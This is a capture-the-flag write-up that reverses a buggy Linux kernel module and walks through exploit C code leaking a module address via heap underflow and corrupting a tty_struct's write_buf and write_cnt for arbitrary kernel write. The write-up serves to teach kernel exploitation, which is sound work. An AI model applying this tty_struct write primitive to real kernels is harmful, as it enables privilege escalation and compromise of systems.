Using tty_struct for arbitrary write

This is a writeup for the slots challenge, which was part of TFC 2025 CTF, that I played together with the Organizers.

The challenge is in the pwn category, and it was marked as a baby (=easy) challenge.

Using tty_struct for arbitrary write

Initial analysis

Upon downloading and extracting the challenge files I saw that this was a Linux kernel challenge.

First it's always useful to check the (hopefully) included config file to see what hardening options will make it more difficult to solve the challenge. In this case we had the following config:

CONFIG_SLUB=y
CONFIG_SLAB_MERGE_DEFAULT=n
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_RANDOM_KMALLOC_CACHES=n

We will use SLUB as the slab allocator
Slab caches are not merged, which could be used to heap overflow into objects of other similar caches if a merge were to happen
The freelist order is randomized - allocations from the initial free list do not follow a sequential order, so object are not necessarily allocated directly after each other
The pointers in the freelist are XORed with some random value and the address where they are stored at
Random kmalloc caches are off - this would make multiple instances of a cache for a given size and pick one randomly at allocation

So we see some heap protection is enabled, why some other options are off.

Let's now look into the rootfs to see what we are working with. We can first gunzip initramfs.cpio.gz, and then cpio -iv < initramfs.cpio to extract the contents.

Inside we see the init file and also slot_machine.ko, let's first check init for how the system is setup, then we can start reversing the kernel module.

#!/bin/sh

export PS1='\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
export LD_LIBRARY_PATH=/lib

chown -R root:root /
chmod 0700 /root
chown -R noob:noob /home/noob

mkdir -p /proc && mount -t proc none /proc
mkdir -p /dev  && mount -t devtmpfs devtmpfs /dev
mkdir -p /tmp  && mount -t tmpfs tmpfs /tmp
mkdir -p /sys && mount -t sysfs none /sys
mkdir -p /dev/pts && mount -t devpts /dev/ptmx /dev/pts

insmod slot_machine.ko
chmod 666 /dev/slot_machine

sysctl -w kernel.modprobe=""
sysctl -w kernel.core_pattern=""
echo 1 | tee /proc/sys/kernel/modules_disabled
echo 0 | tee /proc/sys/kernel/usermodehelper/bset
echo 0 | tee /proc/sys/kernel/usermodehelper/inheritable
echo "" | tee /sys/kernel/uevent_helper  >/dev/null

rm flag
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"

#grep 0x /sys/module/slot_machine/sections/.*

exec su -s /bin/sh - noob
#exec /bin/sh

poweroff -d 0 -f

Ignoring the commented lines I have added during the challenge for debugging, we see mostly regular instructions, and we also see the slot_machine.ko module being loaded using insmod.

One last important aspect, before we jump into reversing the kernel module, is to check the kernel command line options, begin passed by QEMU in run.sh.

console=ttyS0 kpti fgkaslr quiet

kpti - will unmap most of the kernel pages when we are executing in usermode.
fgkaslr - is a stronger variant of kaslr in which a more finer grain approach is taken to ASLR in the kernel. Instead of rebasing the entire .text section, it will also randomize the location of functions contained within.

Reversing the module

First we look at init_module to see how the given module is setup. Most of the code I'll skip, since it's template character device setup, however note the following interesting piece of code:

        fd_flag = filp_open("/flag",0,0);
        if (fd_flag < 0xfffffffffffff001) {
          while( true ) {
            flag_size = uVar1;
            __n = kernel_read(fd_flag,local_118,0xff,&local_120);
            if ((long)__n < 1) break;
            uVar1 = flag_size + __n;
            if (0x400 < uVar1) {
              filp_close(fd_flag,0);
              return 0xfffffff4;
            }
            memcpy(&flag_data + flag_size,local_118,__n);
          }
          if (__n == 0) {
            (&flag_data)[flag_size] = 0;
            filp_close(fd_flag,0);
            _printk(&DAT_00100820,"slot_machine");
            fd_flag = 0;
          }
          else {
            filp_close(fd_flag,0);
            fd_flag = __n & 0xffffffff;
          }

The module will read in the /flag file and store the contents in an array in the .bss section.

The only interesting function left to look at is the my_ioctl function. We can spot commands 0, 1, 3 and 1337.

Command 0 is going to make an allocation on the heap based on user input:

        if (1 < chunk_allocated_times) {
          return 0xffffffffffffffea;
        }
        lVar1 = _copy_from_user(&local_20,arg,8);
        if (lVar1 != 0) {
          return 0xfffffffffffffff2;
        }
        chunk = (void *)__kmalloc_noprof(local_20,0xcc0);
        if (chunk == (void *)0x0) {
          return 0xfffffffffffffff4;
        }
        chunk_allocated_times = chunk_allocated_times + 1;
        chunk_size = local_20;
        return 0;

The only argument from the user is the size of the allocation, which doesn't have a limit, as long as the allocation will succeed. Also note, how chunk_allocated_times is incremented at the end, and checked to be less than 1 at the start.

This means we are left with only a single heap allocation (unless we can overwrite this value). This makes heap grooming a bit more restricted since we can only have one custom-sized allocation.

Command 1 is going to free the allocation:

      if (chunk == (void *)0x0) {
        return 0;
      }
      kfree(chunk);
      return 0;

You might notice a glaring issue already without even having looked at how the chunk is being used. After freeing the chunk, none of the associated variables (size or pointer) are nullified, therefore this opens up a use after free vulnerability.

Command 3 is going to copy input from userspace to the allocated kernel buffer:

    lVar1 = _copy_from_user(&local_20,arg,0x18);
    if (lVar1 != 0) {
      return 0xfffffffffffffff2;
    }
    if ((chunk == (void *)0x0) || (chunk_size < local_20 + local_18)) {
      return 0xffffffffffffffea;
    }
    if (0x7fffffff < local_18) goto LAB_trap;
    lVar1 = _copy_from_user((void *)((long)chunk + local_20),local_10,(uint)local_18);

It's easier to understand if we go backwards from _copy_from_user:

local_20 is the offset used into the heap chunk
local_10 is the user pointer to copy data from
local_18 is the amount of data to copy

The only checks are:

We have heap allocation
The offset plus the amount to copy is not above the chunk size
The amount of data to copy is limited to 0x7fffffff

You might notice a slight issue in this case as well! Although they check if the offset+length would overflow the buffer, they don't check if it underflows.

More specifically it is possible to provide a negative offset in local_20, but we have to compensate using the length - local_18 - because the size comparison is unsigned (using the JA instruction).

This gives us a somewhat constrained, but generous relative write primitve on the heap. We will use this fact later in the exploitation phase as well.

Finally command 1337, allows the user to read data from the allocated heap chunk:

    lVar1 = _copy_from_user(&local_20,arg,0x18);
    if (lVar1 != 0) {
      return 0xfffffffffffffff2;
    }
    if (chunk == (void *)0x0) {
      return 0xffffffffffffffea;
    }
    if (chunk_size < local_20 + local_18) {
      return 0xffffffffffffffea;
    }
    if (0x7fffffff < local_18) {
LAB_trap:
      do {
        invalidInstructionException();
      } while( true );
    }
    lVar1 = _copy_to_user(local_10,(long)chunk + local_20,local_18);

Similarly to the previous command, we discover the same bugs and the same way to exploit them. Only this time it gives us a read primitive on the heap.

This concludes the reversing of the kernel module, and now we should move on to the exploitation phase.

Exploitation

Since our primitives are read/write on the heap and a use-after-free, but our flag is in the .bss segment of the kernel module we need a way to achieve read in the kernel module. And for such a primitive to be useful, we should also leak aa .bss address from the kernel module somehow.

However a classical approach is hindered by the hardening flags in the config we have visited already.

A simple overwrite of a free pointer is tricky becuase of CONFIG_SLAB_FREELIST_HARDENED
Using the relative read/write primitives is also tricky because of CONFIG_SLAB_FREELIST_RANDOM, since an allocated structure will be at a random offset from the heap chunk where we are basing our primitive from.

Looking more around where our modules stores the chunk pointer we can see other interesting heap addresses in the .bss section for my_device and my_class.

We can use gdb to inspect what is happening at these memory locations! First add the -s -S switches to the QEMU run command, then start qemu and attach to it with gdb using target remote :1234.

We can also list the addresses of different sections of the kernel module using:

grep 0x /sys/module/slot_machine/sections/.*

Here we are interested in the .bss section. We can dump from .bss+0x420, since that is where the chunk_allocated_times variable is stored and after it we have bunch of interesting data.

GDB output showing the dump of .bss+0x420

As you can see, this is before any interaction with the module, thus chunk_allocated_times is 0, just like chunk_size and chunk itself.

What is more important is to look at the next 2 pointers, my_device and my_class. Both are pointing to a string, the name of the device. But while my_device points to a heap location containing the string, my_class doesn't point to a heap address.

In fact if you check the address of the .rodata.str1.1 section, you will find it matches exactly with where the string is stored. class_create will take in the name of the device and return a class struct as below:

struct class {
    const char      *name;

    const struct attribute_group    **class_groups;
    const struct attribute_group    **dev_groups;

    int (*dev_uevent)(const struct device *dev, struct kobj_uevent_env *env);
    char *(*devnode)(const struct device *dev, umode_t *mode);

    void (*class_release)(const struct class *class);
    void (*dev_release)(struct device *dev);

    int (*shutdown_pre)(struct device *dev);

    const struct kobj_ns_type_operations *ns_type;
    const void *(*namespace)(const struct device *dev);

    void (*get_ownership)(const struct device *dev, kuid_t *uid, kgid_t *gid);

    const struct dev_pm_ops *pm;
};

So we see the first element of this struct is just a (const) pointer to the name. If we look at the implementation we can see that it just takes the name pointer it gets and stores it, without duplicating the string on the heap or anything similar:

struct class *class_create(const char *name)
{
    struct class *cls;
    int retval;

    cls = kzalloc(sizeof(*cls), GFP_KERNEL);
    if (!cls) {
        retval = -ENOMEM;
        goto error;
    }

    cls->name = name;
    cls->class_release = class_create_release;

    retval = class_register(cls);
    if (retval)
        goto error;

    return cls;

error:
    kfree(cls);
    return ERR_PTR(retval);
}

This is good for us, since if we can leak this address from the heap, we can compute the .bss address, and then at least we will know where the flag is stored.

Choosing the right size

Recall that since CONFIG_SLAB_FREELIST_RANDOM is enabled, we don't have a guarantee that our allocation of the same size as a class struct will end up after the struct of interest.

In general I have noticed by messing around with different sized allocations going into different caches, that some sizes, especially the larger ones, tend to get allocated after the struct in interest, while smaller allocations usually get allocated before the struct.

Since our read primitive is an underflow, it is critical that the struct to leak from resides at a lower address than our allocation. At the same time we must make sure that we are not too far away from it, otherwise we hit the limitation on the size of the operation, as discussed in the reversing section.

In my exploit I chose an allocation size of 1024, which should end up in kmalloc-1k, which allocates after class struct, reasonably often. However there is another consideration with this size that is helpful for us.

This also happens to be the cache, where tty_struct gets allocated to. Indeed choosing the right size here is tricky, not only because of the random order, but because of the single allocation constraint of the challenge.

We can't simply use one allocation to leak an address and then use another one to perform a use-after-free, which we turn into an arbitrary read/write. Our single allocation has to work both for UAF and leaking purposes!

But remember, that the class struct is still at a random offset before our allocation, so I wrote the following code to search for the address to leak:

uint64_t find_mod_leak(int fd) {
    unsigned char resp[ALLOC_SIZE];
    struct ctx_rw reading;
    reading.buf = &read_buf[0];

    for (long i = 0x100000; i < MAX_SEARCH; i += ALLOC_SIZE) {
        reading.offset = -i;
        reading.len = i + ALLOC_SIZE;
        ioctl(fd, CMD_READ, &reading);
        uint64_t* probe = (uint64_t*)&read_buf[0];
        printf("offset: %ld\n", i);
        for (int j = 0; j < ALLOC_SIZE/8 - 2; ++j) {
            uint64_t cand = probe[j];
            if ((cand & 0xfffffffff0000000) == 0xffffffffc0000000 &&
                    (cand & 0xfff) == 0x000 &&
                    probe[j+1] == 0 && probe[j+2] == 0) {
                printf("found module string @ %p\n", cand);
                return cand;
            }
        }
    }
    puts("failed to find str!\n");
}

It simply goes 8-bytes at a time backwards and checks the bits of the address not randomized by KASLR. If we find an address, let's also check the next two 8-byte values, as we expect these to be 0 in the class struct. This is done to eliminate some false positives, which do not give the address of .rodata.str1.1.

Now we can reconstruct the address of the flag as such:

    uint64_t mod_leak = find_mod_leak(fd);
    uint64_t bss_base = mod_leak - 0x1ac0;
    uint64_t chunk_ptr_loc = bss_base + 0x430;
    uint64_t flag_loc = bss_base + 0x20;

But there's still the issue that we need to read the flag somehow.

Reading out the flag

Now at least we know the address of the flag but how can we read it out?

It's not like we can use the current constrained heap read primitive, since we don't have the flag on the heap. Another option could be to find a struct which grants you arbitrary read if you can modify some field of it through UAF.

During the contest however, I didn't find such a struct, or the ones I found did not have an allocation size through which I was able to leak the flag's address.

Instead I opted to use tty_struct, which is well known for it's ability to gain RIP control by overwriting the ops field (or one of the op function pointers inside of it) and then triggering the call of the operation from userspace - such as using ioctl.

However, here we are too far off of code execution. We don't have any useful code pointers and even if we could leak some code pointer, fgkaslr is here to cause pain.

Instead I opt to use tty_struct for an arbitrary write, which is the main point of why I decided to post this writeup for this otherwise easy challenge.

I didn't find any public writeups utilizing tty_struct for arbitrary write, and in general there are not too many posts focusing on this exact way to arbitrary write.

Many posts give write primitves that work by controlling a large part of a given struct, and then overlapping that struct with another chunk that contains some useful struct.

Nevertheless, I don't think this is a hidden/novel technique, just it's not super explicitly stated as far as I can tell, so here it is for future reference!

Looking at the tty_struct the question is, what pointers does it have, and what can we gain by controlling them.

struct tty_struct {
    struct kref kref;
    int index;
    struct device *dev;
    struct tty_driver *driver;
    struct tty_port *port;
    const struct tty_operations *ops;

    struct tty_ldisc *ldisc;
    struct ld_semaphore ldisc_sem;

    struct mutex atomic_write_lock;
    struct mutex legacy_mutex;
    struct mutex throttle_mutex;
    struct rw_semaphore termios_rwsem;
    struct mutex winsize_mutex;
    struct ktermios termios, termios_locked;
    char name[64];
    unsigned long flags;
    int count;
    unsigned int receive_room;
    struct winsize winsize;

    struct {
        spinlock_t lock;
        bool stopped;
        bool tco_stopped;
    } flow;

    struct {
        struct pid *pgrp;
        struct pid *session;
        spinlock_t lock;
        unsigned char pktstatus;
        bool packet;
    } ctrl;

    bool hw_stopped;
    bool closing;
    int flow_change;

    struct tty_struct *link;
    struct fasync_struct *fasync;
    wait_queue_head_t write_wait;
    wait_queue_head_t read_wait;
    struct work_struct hangup_work;
    void *disc_data;
    void *driver_data;
    spinlock_t files_lock;
    int write_cnt;
    u8 *write_buf;

    struct list_head tty_files;

    struct work_struct SAK_work;
} __randomize_layout;

There are many pointers to other structs, and of course ops is quite well-known. However write_buf immediately sticks out as an interesting pointer.

Just based on it's name, if some sort of write happens to this buf, and we can control the pointer, then we can achieve arbitrary write.

If we track where the tty_write function takes us, we will end up at:

static ssize_t file_tty_write(struct file *file, struct kiocb *iocb, struct iov_iter *from)
{
    struct tty_struct *tty = file_tty(file);
    struct tty_ldisc *ld;
    ssize_t ret;

    if (tty_paranoia_check(tty, file_inode(file), "tty_write"))
        return -EIO;
    if (!tty || !tty->ops->write || tty_io_error(tty))
        return -EIO;
    /* Short term debug to catch buggy drivers */
    if (tty->ops->write_room == NULL)
        tty_err(tty, "missing write_room method\n");
    ld = tty_ldisc_ref_wait(tty);
    if (!ld)
        return hung_up_tty_write(iocb, from);
    if (!ld->ops->write)
        ret = -EIO;
    else
        ret = iterate_tty_write(ld, tty, file, from);
    tty_ldisc_deref(ld);
    return ret;
}

We see there's 2 ways to continue, besides the error cases. hung_up_tty_write will just lead to another error returned, and thus the only happy path is going through iterate_tty_write.

If we check inside of this function, we start to see how write_buf is going to be used:

    // [...]
    chunk = 2048;
    if (test_bit(TTY_NO_WRITE_SPLIT, &tty->flags))
        chunk = 65536;
    if (count < chunk)
        chunk = count;

    /* write_buf/write_cnt is protected by the atomic_write_lock mutex */
    if (tty->write_cnt < chunk) {
        u8 *buf_chunk;

        if (chunk < 1024)
            chunk = 1024;

        buf_chunk = kvmalloc(chunk, GFP_KERNEL | __GFP_RETRY_MAYFAIL);
        if (!buf_chunk) {
            ret = -ENOMEM;
            goto out;
        }
        kvfree(tty->write_buf);
        tty->write_cnt = chunk;
        tty->write_buf = buf_chunk;
    }
    // [...]

Here we see that if we take the branch on tty->write_cnt < chunk, then we will allocate a new buffer for the write_buf, which will nuke the pointer we will carefully place there.

As such, it is important to also overwrite the write_cnt field, such that it is at least as large as the chunk variable of this function.

We see the default value is either 2048 or 65535 depending on the flags of the tty_struct. However ultimately it is the count that determines the value of chunk, which is taken from the iov_iter that is initially passed to tty_write.

Therefore our only job is to overwrite the write_buf pointer and then also to make sure that the write_cnt is large enough so we avoid nuking the pointer.

Afterwards the write to our buffer quickly happens without further restrictions:

/* Do the write .. */
    for (;;) {
        size_t size = min(chunk, count);

        ret = -EFAULT;
        if (copy_from_iter(tty->write_buf, size, from) != size)
            break;
    // [...]

The copy_from_iter call will already copy the data we provided in userspace to the write_buf.

And thus we have arbitrary write using tty_struct by abusing a UAF on the write_buf and write_cnt fields.

Write What Where

Now that we have an arbitrary write primitive, it will still not get us the flag content by itself.

The approach here is simple, overwrite the chunk pointer in the provided kernel module, such that it points to the flag, and then use the read ioctl to get the flag content to userspace and then print it from there.

The exploit (after leaking necessary addresses) will free the 1024 chunk and allocate a tty_struct in its place by opening /dev/ptmx.

    ioctl(fd, CMD_FREE, NULL);
    int fd2 = open("/dev/ptmx", O_RDWR | O_NOCTTY);

Afterwards, we proceed to overwrite only the required fields (first we leak the entire struct, make changes, then overwrite the entire struct).

    uint8_t tty_struct[1024];

    struct ctx_rw reading;
    reading.offset = 0;
    reading.len = ALLOC_SIZE;
    reading.buf = &tty_struct[0];

    ioctl(fd, CMD_READ, &reading);

    uint32_t* write_cnt = (uint32_t*)(&tty_struct[596]);
    uint64_t* write_buf = (uint64_t*)(&tty_struct[600]);

    // Ensure larger than chunk size so that we don't kmalloc a new buf
    *write_cnt = 4096;
    // Want to overwrite the chunk pointer
    *write_buf = chunk_ptr_loc;

    // Reuse same buffer + info for overwrite
    ioctl(fd, CMD_WRITE, &reading);

Now a write to the tty device from user space will actually write to the chunk pointer of the kernel module, so we overwrite it with the address of the flag:

    char* data = (char*)&flag_loc;
    write(fd2, data, sizeof(data));

At last, a read using the ioctl of the kernel module will yield the flag:

    // read modified pointer to the flag into the tty_struct
    ioctl(fd, CMD_READ, &reading);
    hexdump(&tty_struct[0], 1024);

    printf("profit! %s\n", &tty_struct[0]);
    fflush(stdout); // flush cause we will crash the kernel xd

Showing the final output of the exploit is the flag

Summary

To summarize this is a bit of an overkill solution to an otherwise easy challenge. After the CTF several players shared their solutions:

There was one, which just creates a large enough allocation and hopes to leak the flag through the underflow. This is a perfectly valid solution and I did not think you can make the allocation be that close to the .bss section of the module. Perhaps they found some remains of the flag on the heap and tried to go near that.
The intended solution is to use the leak in this writeup, but then just use tty_struct, or another struct with RIP control to crash at the flag location. Because we see the kernel panic without any restrictions, you can leak the flag 8 bytes at a time by just pointing RIP at different offsets from the flag base.

Nevertheless I do think my approach is more general and can even avoid crashing the kernel and it also works with a hardened configuration which is more strict about the display of panic messages.

The crash we could recover from by restoring the original values of the write_buf and write_cnt fields, such that when we close the file descriptor and the tty_struct is freed, it won't try to kfree from the .bss section.

The idea would be to leak the heap pointer of the struct (I think this should be possible), and then use the write ioctl after the flag is read out to overwrite the chunk pointer back to the heap. Then we can again edit the fields of the tty_struct to safe values.

I also like that this exploit is single-shot, whereas the intended solution requires running the exploit multiple times.

In any case the main takeaway from this post, should be the cool arbitrary write you can gain by controlling a tty_struct.